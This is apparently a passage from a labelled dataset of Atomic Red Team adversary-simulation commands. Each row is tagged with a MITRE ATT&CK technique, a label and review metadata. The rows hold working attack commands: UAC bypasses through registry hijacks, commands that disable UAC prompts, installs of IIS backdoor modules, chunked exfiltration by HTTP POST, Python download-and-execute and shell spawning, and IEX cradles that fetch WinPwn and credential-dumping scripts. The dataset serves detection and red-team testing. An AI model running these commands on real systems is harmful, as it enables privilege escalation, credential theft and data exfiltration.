Ransomware](https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat) ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 52db562fbf236d863ab5024a,"New-Item #{commandpath} -Force | Out-Null New-ItemProperty -Path #{commandpath} -Name ""DelegateExecute"" -Value """" -Force | Out-Null Set-ItemProperty -Path #{commandpath} -Name ""(default)"" -Value ""#{commandtorun}"" -Force -ErrorAction SilentlyContinue | Out-Null $Process = Start-Process -FilePath ""C:\Windows\System32\WSReset.exe"" -WindowStyle Hidden","New-Item #{commandpath} -Force | Out-Null New-ItemProperty -Path #{commandpath} -Name ""DelegateExecute"" -Value """" -Force | Out-Null Set-ItemProperty -Path #{commandpath} -Name ""(default)"" -Value ""#{commandtorun}"" -Force -ErrorAction SilentlyContinue | Out-Null $Process = Start-Process -FilePath ""C:\Windows\System32\WSReset.exe"" -WindowStyle Hidden",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,UAC Bypass with WSReset Registry Modification,T1548.002,"[""T1548.002""]",windows,0.9,False,"The following UAC bypass is focused on a registry key under ""HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"" that will trigger a command once wsreset.exe runs. This bypass is limited to Windows 10 1803/1809 and may not run on Server platforms. The registry mod is where interest will be. If successful, the command to run will spawn off wsreset.exe. [UAC Bypass in Windows 10 Store Binary](https://0x1.gitlab.io/exploit/UAC-Bypass-in-Windows-10-Store-Binary/) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2fb07d5b8d4723dcf6e7294a,Remove-Item #{commandpath} -Recurse -Force,Remove-Item #{commandpath} -Recurse -Force,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,UAC Bypass with WSReset Registry Modification,T1548.002,"[""T1548.002""]",windows,0.55,True,"The following UAC bypass is focused on a registry key under ""HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"" that will trigger a command once wsreset.exe runs. This bypass is limited to Windows 10 1803/1809 and may not run on Server platforms. The registry mod is where interest will be. If successful, the command to run will spawn off wsreset.exe. [UAC Bypass in Windows 10 Store Binary](https://0x1.gitlab.io/exploit/UAC-Bypass-in-Windows-10-Store-Binary/) ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d46046491ca7dc4ca2528e4f,Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0 -Type Dword -Force,Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0 -Type Dword -Force,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Disable UAC - Switch to the secure desktop when prompting for elevation via registry key,T1548.002,"[""T1548.002""]",windows,0.9,False,"User Account Control (UAC) is a security mechanism for limiting the elevation of privileges, including administrative accounts, unless authorized. This setting ensures that the elevation prompt is only used in secure desktop mode. Disable User Account Conrol (UAC) for secure desktop by setting the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop to 0. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7922645868016d66683579ae,Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 1 -Type Dword -Force,Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 1 -Type Dword -Force,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Disable UAC - Switch to the secure desktop when prompting for elevation via registry key,T1548.002,"[""T1548.002""]",windows,0.55,True,"User Account Control (UAC) is a security mechanism for limiting the elevation of privileges, including administrative accounts, unless authorized. This setting ensures that the elevation prompt is only used in secure desktop mode. Disable User Account Conrol (UAC) for secure desktop by setting the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop to 0. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c2f88b9769115a0d43a9ae91,"reg add ""HKLM\SOFTWARE\Microsoft\Security Center"" /v UACDisableNotify /t REG_DWORD /d 1 /f","reg add ""HKLM\SOFTWARE\Microsoft\Security Center"" /v UACDisableNotify /t REG_DWORD /d 1 /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Disable UAC notification via registry keys,T1548.002,"[""T1548.002""]",windows,0.9,False,This atomic regarding UACDisableNotify pertains to the notification behavior of UAC. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. The BlotchyQuasar RAT defense evasion activities that the adversary to disable UAC notifications makes it easier for malware and malicio,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f4d19cd39816df1275a8c879,"reg add ""HKLM\SOFTWARE\Microsoft\Security Center"" /v UACDisableNotify /t REG_DWORD /d 0 /f","reg add ""HKLM\SOFTWARE\Microsoft\Security Center"" /v UACDisableNotify /t REG_DWORD /d 0 /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Disable UAC notification via registry keys,T1548.002,"[""T1548.002""]",windows,0.55,True,This atomic regarding UACDisableNotify pertains to the notification behavior of UAC. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. The BlotchyQuasar RAT defense evasion activities that the adversary to disable UAC notifications makes it easier for malware and malicio,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 760db292c5f6b4cd7786a5ec,"reg add ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f","reg add ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Disable ConsentPromptBehaviorAdmin via registry keys,T1548.002,"[""T1548.002""]",windows,0.9,False,"This atomic regarding setting ConsentPromptBehaviorAdmin to 0 configures the UAC so that it does not prompt for consent or credentials when actions requiring elevated privileges are performed by users in the administrators group. This means that any operation that would normally trigger a UAC prompt will proceed automatically without user interaction. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0c9c037d3993e2740c0d2936,"reg add ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5 /f","reg add ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5 /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Disable ConsentPromptBehaviorAdmin via registry keys,T1548.002,"[""T1548.002""]",windows,0.55,True,"This atomic regarding setting ConsentPromptBehaviorAdmin to 0 configures the UAC so that it does not prompt for consent or credentials when actions requiring elevated privileges are performed by users in the administrators group. This means that any operation that would normally trigger a UAC prompt will proceed automatically without user interaction. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 937edec08eb91da0e74f6443,"reg add ""HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command"" /ve /d ""C:\Windows\System32\calc.exe"" /f reg add ""HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer"" /ve /d "".pwn"" /f echo Triggering fodhelper.exe for potential privilege escalation... start fodhelper.exe","reg add ""HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command"" /ve /d ""C:\Windows\System32\calc.exe"" /f reg add ""HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer"" /ve /d "".pwn"" /f echo Triggering fodhelper.exe for potential privilege escalation... start fodhelper.exe",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,UAC bypassed by Utilizing ProgIDs registry.,T1548.002,"[""T1548.002""]",windows,0.9,False,"This atomic designed to simulate the UAC bypassed made by ValleyRAT by adding customized ProgIDs registry entry. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 63b8a598c2f73440bb7c1e1e,"reg delete ""HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command"" /ve /f reg delete ""HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer"" /ve /f","reg delete ""HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command"" /ve /f reg delete ""HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer"" /ve /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,UAC bypassed by Utilizing ProgIDs registry.,T1548.002,"[""T1548.002""]",windows,0.55,True,"This atomic designed to simulate the UAC bypassed made by ValleyRAT by adding customized ProgIDs registry entry. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9bc7f37283e4b0b9195a21ee,%windir%\system32\inetsrv\appcmd.exe install module /name:#{module_name} /image:#{dll_path},%windir%\system32\inetsrv\appcmd.exe install module /name:#{module_name} /image:#{dll_path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1505.004/T1505.004.yaml,Install IIS Module using AppCmd.exe,T1505.004,"[""T1505.004""]",windows,0.9,False,"The following Atomic will utilize AppCmd.exe to install a new IIS Module. IIS must be installed. This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/). A successful execution will install a module into IIS using AppCmd.exe. [Managing and installing Modules Reference](https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#to-install-a-mo",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ec99c2a4ae700b193a835da4,%windir%\system32\inetsrv\appcmd.exe uninstall module #{module_name},%windir%\system32\inetsrv\appcmd.exe uninstall module #{module_name},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1505.004/T1505.004.yaml,Install IIS Module using AppCmd.exe,T1505.004,"[""T1505.004""]",windows,0.55,True,"The following Atomic will utilize AppCmd.exe to install a new IIS Module. IIS must be installed. This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/). A successful execution will install a module into IIS using AppCmd.exe. [Managing and installing Modules Reference](https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#to-install-a-mo",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e0638c2a57f0b229b677ad63,New-WebGlobalModule -Name #{module_name} -Image #{dll_path},New-WebGlobalModule -Name #{module_name} -Image #{dll_path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1505.004/T1505.004.yaml,Install IIS Module using PowerShell Cmdlet New-WebGlobalModule,T1505.004,"[""T1505.004""]",windows,0.9,False,"The following Atomic will utilize PowerShell Cmdlet New-WebGlobalModule to install a new IIS Module. IIS must be installed. This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/). A successful execution will install a module into IIS using New-WebGlobalModule. [Managing IIS Modules with PowerShell](https://learn.microsoft.com/en-us/powershell/module/webadministration/set-w",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 05d9e41b48482ce65dd1d336,Remove-WebGlobalModule -Name #{module_name},Remove-WebGlobalModule -Name #{module_name},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1505.004/T1505.004.yaml,Install IIS Module using PowerShell Cmdlet New-WebGlobalModule,T1505.004,"[""T1505.004""]",windows,0.55,True,"The following Atomic will utilize PowerShell Cmdlet New-WebGlobalModule to install a new IIS Module. IIS must be installed. This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/). A successful execution will install a module into IIS using New-WebGlobalModule. [Managing IIS Modules with PowerShell](https://learn.microsoft.com/en-us/powershell/module/webadministration/set-w",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5be5e2266005b1376353c7cc,cd #{folder_path}; split -b 5000000 #{file_name} ls -l #{folder_path},cd #{folder_path}; split -b 5000000 #{file_name} ls -l #{folder_path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1030/T1030.yaml,Data Transfer Size Limits,T1030,"[""T1030""]","macos,linux",0.9,False,"Take a file/directory, split it into 5Mb chunks ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e317c25626132ce546edffdd,if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;,if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1030/T1030.yaml,Data Transfer Size Limits,T1030,"[""T1030""]","macos,linux",0.55,True,"Take a file/directory, split it into 5Mb chunks ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a2d63d088f8d4c67483e5532,"$file = [System.IO.File]::OpenRead(#{source_file_path}) $chunkSize = #{chunk_size} * 1KB $buffer = New-Object Byte[] $chunkSize while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) { $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead) Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk } $file.Close()","$file = [System.IO.File]::OpenRead(#{source_file_path}) $chunkSize = #{chunk_size} * 1KB $buffer = New-Object Byte[] $chunkSize while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) { $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead) Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk } $file.Close()",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1030/T1030.yaml,Network-Based Data Transfer in Small Chunks,T1030,"[""T1030""]",windows,0.9,False,Simulate transferring data over a network in small chunks to evade detection.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2e372927103297975e1b92b7,"Start-Process ""#{exe_binary}"" Start-Sleep -Seconds 7 if (Test-Path ""C:\Users\Default\AppData\Local\Temp\hello.log"") { Remove-Item ""C:\Users\Default\AppData\Local\Temp\hello.log"" -Force; Write-Host ""[+] hello.log removed."" }","Start-Process ""#{exe_binary}"" Start-Sleep -Seconds 7 if (Test-Path ""C:\Users\Default\AppData\Local\Temp\hello.log"") { Remove-Item ""C:\Users\Default\AppData\Local\Temp\hello.log"" -Force; Write-Host ""[+] hello.log removed."" }",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1027.007/T1027.007.yaml,Dynamic API Resolution-Ninja-syscall,T1027.007,"[""T1027.007""]",windows,0.9,False,"This test calls NtCreateFile via API hashing and dynamic syscall resolution. I have dubbed this particular combination of techniques 'Ninja-syscall'. When successful, a new file named 'hello.log' will be created in the default user's temporary folder, which is a common location for a dropper. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cadc62f76dccb533c9f56527,"if (Test-Path ""C:\Users\Default\AppData\Local\Temp\hello.log"") { Remove-Item ""C:\Users\Default\AppData\Local\Temp\hello.log"" -Force; Write-Host ""[+] hello.log removed."" }","if (Test-Path ""C:\Users\Default\AppData\Local\Temp\hello.log"") { Remove-Item ""C:\Users\Default\AppData\Local\Temp\hello.log"" -Force; Write-Host ""[+] hello.log removed."" }",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1027.007/T1027.007.yaml,Dynamic API Resolution-Ninja-syscall,T1027.007,"[""T1027.007""]",windows,0.55,True,"This test calls NtCreateFile via API hashing and dynamic syscall resolution. I have dubbed this particular combination of techniques 'Ninja-syscall'. When successful, a new file named 'hello.log' will be created in the default user's temporary folder, which is a common location for a dropper. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2752334094c52d5b10b413f8,"which_python=$(which python || which python3 || which python3.9 || which python2) $which_python -c 'import requests;import os;url = ""#{script_url}"";malicious_command = ""#{executor} #{payload_file_name} #{script_args}"";session = requests.session();source = session.get(url).content;fd = open(""#{payload_file_name}"", ""wb+"");fd.write(source);fd.close();os.system(malicious_command)'","which_python=$(which python || which python3 || which python3.9 || which python2) $which_python -c 'import requests;import os;url = ""#{script_url}"";malicious_command = ""#{executor} #{payload_file_name} #{script_args}"";session = requests.session();source = session.get(url).content;fd = open(""#{payload_file_name}"", ""wb+"");fd.write(source);fd.close();os.system(malicious_command)'",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1059.006/T1059.006.yaml,Execute shell script via python's command mode arguement,T1059.006,"[""T1059.006""]",linux,0.9,False,Download and execute shell script and write to file then execute locally using Python -c (command mode),primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d1173b08338346bbc98228ea,rm #{payload_file_name} pip-autoremove pypykatz >nul 2> nul,rm #{payload_file_name} pip-autoremove pypykatz >nul 2> nul,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1059.006/T1059.006.yaml,Execute shell script via python's command mode arguement,T1059.006,"[""T1059.006""]",linux,0.55,True,Download and execute shell script and write to file then execute locally using Python -c (command mode),unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a691bb4bd569cb215b6a4028,rm #{python_script_name} #{payload_file_name},rm #{python_script_name} #{payload_file_name},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1059.006/T1059.006.yaml,Execute Python via scripts,T1059.006,"[""T1059.006""]",linux,0.55,True,Create Python file (.py) that downloads and executes shell script via executor arguments,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 878ddfd5a38f3da0b87c6694,rm #{python_binary_name} #{python_script_name} #{payload_file_name},rm #{python_binary_name} #{python_script_name} #{payload_file_name},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1059.006/T1059.006.yaml,Execute Python via Python executables,T1059.006,"[""T1059.006""]",linux,0.55,True,"Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0936d0460b2a21c08c78ba46,"which_python=$(which python || which python3 || which python3.9 || which python2) $which_python -c ""import pty;pty.spawn('/bin/sh')"" exit $which_python -c ""import pty;pty.spawn('/bin/bash')"" exit","which_python=$(which python || which python3 || which python3.9 || which python2) $which_python -c ""import pty;pty.spawn('/bin/sh')"" exit $which_python -c ""import pty;pty.spawn('/bin/bash')"" exit",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1059.006/T1059.006.yaml,Python pty module and spawn function used to spawn sh or bash,T1059.006,"[""T1059.006""]",linux,0.9,False,"Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bb595412dc9cedf8664474df,dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data,dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1027.001/T1027.001.yaml,Pad Binary to Change Hash - Linux/macOS dd,T1027.001,"[""T1027.001""]","linux,macos",0.9,False,"Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash. Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8ac083b1678b32206100de0d,rm #{file_to_pad},rm #{file_to_pad},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1027.001/T1027.001.yaml,Pad Binary to Change Hash - Linux/macOS dd,T1027.001,"[""T1027.001""]","linux,macos",0.55,True,"Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash. Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 37a4593a8d3267d7d73e6ec9,truncate -s +1 #{file_to_pad} #adds a byte to the file size,truncate -s +1 #{file_to_pad} #adds a byte to the file size,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1027.001/T1027.001.yaml,Pad Binary to Change Hash using truncate command - Linux/macOS,T1027.001,"[""T1027.001""]","linux,macos",0.9,False,"Uses truncate to add a byte to the binary to change the hash. Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9760c25da0a0795e0278b6d9,"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1"" -UseBasicParsing) Invoke-Maldoc -macroFile ""PathToAtomicsFolder\T1555\src\T1555-macrocode.txt"" -officeProduct ""Word"" -sub ""Extract""","[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1"" -UseBasicParsing) Invoke-Maldoc -macroFile ""PathToAtomicsFolder\T1555\src\T1555-macrocode.txt"" -officeProduct ""Word"" -sub ""Extract""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1555/T1555.yaml,Extract Windows Credential Manager via VBA,T1555,"[""T1555""]",windows,0.9,False,"This module will extract the credentials found within the Windows credential manager and dump them to $env:TEMP\windows-credentials.txt ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 96b404a363ae26757fe421a7,"Remove-Item ""$env:TEMP\windows-credentials.txt"" -ErrorAction Ignore","Remove-Item ""$env:TEMP\windows-credentials.txt"" -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1555/T1555.yaml,Extract Windows Credential Manager via VBA,T1555,"[""T1555""]",windows,0.55,True,"This module will extract the credentials found within the Windows credential manager and dump them to $env:TEMP\windows-credentials.txt ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ca66ffd1cb8cd461b8cb53dd,IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force,IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1555/T1555.yaml,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],T1555,"[""T1555""]",windows,0.9,False,This module will extract the credentials from Windows Credential Manager,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 00326d6491bbc9b6f1bfcbad,IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force,IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1555/T1555.yaml,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],T1555,"[""T1555""]",windows,0.9,False,This module will extract the credentials from Windows Credential Manager,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2a467a6088d807d82d2bcc4d,"vaultcmd /listcreds:""Windows Credentials"" /all","vaultcmd /listcreds:""Windows Credentials"" /all",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1555/T1555.yaml,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],T1555,"[""T1555""]",windows,0.9,False,This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a97f85afdf993b7acdded684,"vaultcmd /listcreds:""Web Credentials"" /all","vaultcmd /listcreds:""Web Credentials"" /all",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1555/T1555.yaml,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],T1555,"[""T1555""]",windows,0.9,False,This module will enumerate credentials stored in Web Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review da65d8f7551e10f75f9e9723,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') lazagnemodule -consoleoutput -noninteractive,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') lazagnemodule -consoleoutput -noninteractive,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1555/T1555.yaml,WinPwn - Loot local Credentials - lazagne,T1555,"[""T1555""]",windows,0.9,False,"The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 66d9ce216fbbef9955db72ee,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') wificreds -consoleoutput -noninteractive,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') wificreds -consoleoutput -noninteractive,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1555/T1555.yaml,WinPwn - Loot local Credentials - Wifi Credentials,T1555,"[""T1555""]",windows,0.9,False,Loot local Credentials - Wifi Credentials technique via function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 58f48058b32e472a78bd1787,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') decryptteamviewer -consoleoutput -noninteractive,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') decryptteamviewer -consoleoutput -noninteractive,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1555/T1555.yaml,WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords,T1555,"[""T1555""]",windows,0.9,False,Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e2e88e87a3f85065eb6d238e,"Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe $file1 = ""C:\Users\"" + $env:username + ""\Desktop\TeamViewer_Setup.exe"" Start-Process -Wait $file1 /S; Start-Process 'C:\Program Files (x86)\TeamViewer\TeamViewer.exe'","Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\TeamViewer_Setup.exe 